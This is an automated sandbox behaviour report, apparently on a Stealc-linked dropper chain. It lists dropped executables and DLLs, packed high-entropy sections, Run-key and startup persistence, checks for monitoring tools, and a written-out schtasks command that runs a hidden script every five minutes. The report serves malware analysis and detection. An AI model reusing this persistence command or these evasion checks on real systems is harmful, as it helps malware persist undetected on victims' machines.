                          Source: new_v8.exe.13.drStatic PE information: section name: .vmp+
                          Source: random[1].exe1.13.drStatic PE information: section name:
                          Source: random[1].exe1.13.drStatic PE information: section name: .rsrc
                          Source: random[1].exe1.13.drStatic PE information: section name: .idata
                          Source: random[1].exe1.13.drStatic PE information: section name: wrsfsivy
                          Source: random[1].exe1.13.drStatic PE information: section name: bfxftgti
                          Source: random[1].exe1.13.drStatic PE information: section name: .taggant
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name:
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: .rsrc
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: .idata
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: wrsfsivy
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: bfxftgti
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: .taggant
                          Source: GOLD1234[1].exe.13.drStatic PE information: section name: .00cfg
                          Source: GOLD1234[1].exe.13.drStatic PE information: section name: .call
                          Source: GOLD1234.exe.13.drStatic PE information: section name: .00cfg
                          Source: GOLD1234.exe.13.drStatic PE information: section name: .call
                          Source: shop[1].exe.13.drStatic PE information: section name: .00cfg
                          Source: shop.exe.13.drStatic PE information: section name: .00cfg
                          Source: freebl3.dll.17.drStatic PE information: section name: .00cfg
                          Source: freebl3[1].dll.17.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.17.drStatic PE information: section name: .00cfg
                          Source: mozglue[1].dll.17.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.17.drStatic PE information: section name: .didat
                          Source: msvcp140[1].dll.17.drStatic PE information: section name: .didat
                          Source: nss3.dll.17.drStatic PE information: section name: .00cfg
                          Source: nss3[1].dll.17.drStatic PE information: section name: .00cfg
                          Source: softokn3.dll.17.drStatic PE information: section name: .00cfg
                          Source: softokn3[1].dll.17.drStatic PE information: section name: .00cfg
                          Source: TPKOcaeSvfBbrcMznKuF.dll.18.drStatic PE information: section name: .eh_fram
                          Source: service123.exe.18.drStatic PE information: section name: .eh_fram
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name:
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: .idata
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: cfyesryy
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: gwntuilp
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: .taggant
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name:
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: .idata
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name:
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: edfilslq
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: gprpjvtr
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00C6D84C push ecx; ret 13_2_00C6D85F
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 13_2_00CA1694 push edi; retf 13_2_00CA1696
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_0078B035 push ecx; ret 17_2_0078B048
                          Source: file.exeStatic PE information: section name: entropy: 7.9851176619482
                          Source: file.exeStatic PE information: section name: mahfbdtk entropy: 7.953063770644612
                          Source: axplong.exe.6.drStatic PE information: section name: entropy: 7.9851176619482
                          Source: axplong.exe.6.drStatic PE information: section name: mahfbdtk entropy: 7.953063770644612
                          Source: random[2].exe.13.drStatic PE information: section name: cbbjugzk entropy: 7.953118561919161
                          Source: c8908bf20d.exe.13.drStatic PE information: section name: cbbjugzk entropy: 7.953118561919161
                          Source: random[1].exe.13.drStatic PE information: section name: entropy: 7.983838861531346
                          Source: 2dc588f7b5.exe.13.drStatic PE information: section name: entropy: 7.983838861531346
                          Source: random[1].exe0.13.drStatic PE information: section name: .text entropy: 7.82060659626259
                          Source: f55899dae2.exe.13.drStatic PE information: section name: .text entropy: 7.82060659626259
                          Source: random[1].exe1.13.drStatic PE information: section name: entropy: 7.981756320370339
                          Source: 550b7cfe5f.exe.13.drStatic PE information: section name: entropy: 7.981756320370339
                          Source: GOLD1234[1].exe.13.drStatic PE information: section name: .text entropy: 7.010787961155337
                          Source: GOLD1234.exe.13.drStatic PE information: section name: .text entropy: 7.010787961155337
                          Source: shop[1].exe.13.drStatic PE information: section name: .text entropy: 7.0240622903518135
                          Source: shop.exe.13.drStatic PE information: section name: .text entropy: 7.0240622903518135
                          Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.drStatic PE information: section name: entropy: 7.80234292244424
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: entropy: 7.984163692603841
                          Source: AAKAL78BRQNYOCIR09Y.exe.22.drStatic PE information: section name: edfilslq entropy: 7.954585037030609
                          Source: Application.exe.33.drStatic PE information: section name: .text entropy: 7.82060659626259

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifFile created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\stealc_default2[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\shop[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\splwow64[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifFile created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scrJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\nss3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile created: C:\Users\user\AppData\Local\Temp\5C4X2NVYNV2E9BIIRWD89LJFJIM.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeFile created: C:\ProgramData\LgAmARwZ\Application.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\Offnewhere[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\vcruntime140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1001471001\c8908bf20d.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\msvcp140[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\softokn3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1001472001\2dc588f7b5.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\freebl3[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\new_v8[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\GOLD1234[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile created: C:\Users\user\AppData\Local\Temp\service123.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeFile created: C:\Users\user\AppData\Local\Temp\TPKOcaeSvfBbrcMznKuF.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeFile created: C:\Users\user\AppData\Local\Temp\AAKAL78BRQNYOCIR09Y.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\mozglue[1].dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\RDX123456[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeFile created: C:\ProgramData\LgAmARwZ\Application.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\axplong.jobJump to behavior
                          Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\ConfigJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c8908bf20d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 2dc588f7b5.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeCode function: 17_2_00789860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,17_2_00789860
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                          Source: C:\Users\user\AppData\Local\Temp\1000857001\550b7cfe5f.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exeProcess information set: NOOPENFILEERRORBOX
